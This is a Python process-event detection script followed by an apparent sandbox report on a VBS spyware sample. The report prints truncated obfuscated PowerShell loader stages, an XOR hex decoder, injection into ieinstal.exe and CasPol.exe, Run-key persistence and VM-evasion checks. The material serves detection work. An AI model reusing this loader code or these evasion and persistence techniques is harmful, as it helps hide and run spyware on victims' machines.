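    img, par = basename(image), basename(parent)
    alerts = []
    if par in SCRIPT_HOSTS and img in POWERSHELL:
        alerts.append(Alert("script_host_to_powershell", "high", image))
    if len(cmd) >= LONG_CMDLINE:
        alerts.append(Alert("long_command_line", "medium", image))
    if img in POWERSHELL and filler_ratio(cmd) >= FILLER_THRESHOLD:
        alerts.append(Alert("obfuscated_command_line", "high", image))
    # 64-bit PowerShell deliberately dropping to the 32-bit host (see the wildcard
    # path S*64\W*Power*\v1.0\*ll.exe in the wrapper above).
    if (par in POWERSHELL and img in POWERSHELL
            and "\\system32\\" in parent.lower() and "\\syswow64\\" in image.lower()):
        alerts.append(Alert("wow64_powershell_hop", "medium", image))
    if img == "caspol.exe" and has_no_arguments(image, cmd):
        alerts.append(Alert("lolbin_no_args", "medium", image))
    return alerts


def analyze(events) -> list:
    return [a for ev in events for a in score_event(ev)]


# Opening of the $Badeanstalt stage, copied from the report; repeated below to reach
# the observed size (a constructed approximation of the 17542-byte line).
OBF_FRAGMENT = ("reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo"
                "(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag")
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
BENIGN_CMDLINE = PS64 + r" -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1"

# Constructed events modelled on the report's process tree. The parent of CasPol.exe
# is not stated in the excerpt; the 32-bit powershell.exe below is an assumption.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"'},
    {"image": PS64, "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": PS64 + ' "$Badeanstalt = """' + OBF_FRAGMENT * 40},
    {"image": PS32, "parent_image": PS64,
     "command_line": PS32 + ' "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2) }"'},
    {"image": CASPOL, "parent_image": PS32, "command_line": CASPOL.replace("CasPol", "caspol")},
    {"image": PS64, "parent_image": r"C:\Windows\System32\svchost.exe", "command_line": BENIGN_CMDLINE},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"{a.severity:6} {a.rule:26} {a.image}")
```

The filler ratio is the one heuristic here that is specific to this obfuscator family; the length and parent-child rules are generic and will also catch other loaders, so tune LONG_CMDLINE against the longest legitimate PowerShell invocations in your environment (configuration-management agents are the usual false positive).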
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 8_2_032279D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07502A18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07507430
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07507420
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07510040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0751EFF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07517798
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0751EFE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07526EE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B73068
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B73D88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B7FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B73650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B7C3B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B7EDD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B7E6F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00E26EBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_1D636FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_1D63A1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_1D639910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_1D6395C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 1D63D140 appears 54 times
            Source: IMG_2022028022-0120.vbs | Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn 
Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 
'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu 
Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elcf2ed.d41.ps1
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@16/7@22/4
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\-0NDOIW
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:304:WilStaging_02
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation

            Source: Yara matchFile source: 0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB044E2314 pushad ; iretd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04458C72 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E629 push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E62B push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E62F push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E5E7 push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750EBA8 push ebp; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750EA58 push edx; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750D1F8 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750D1AB push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07505810 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07517E70 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B78A5F push edi; retn 0000h

            Boot Survival

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Attractant
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hugi
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768 | Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768 | Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7516 | Thread sleep count: 9929 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204 | Thread sleep time: -60000s >= -30000s
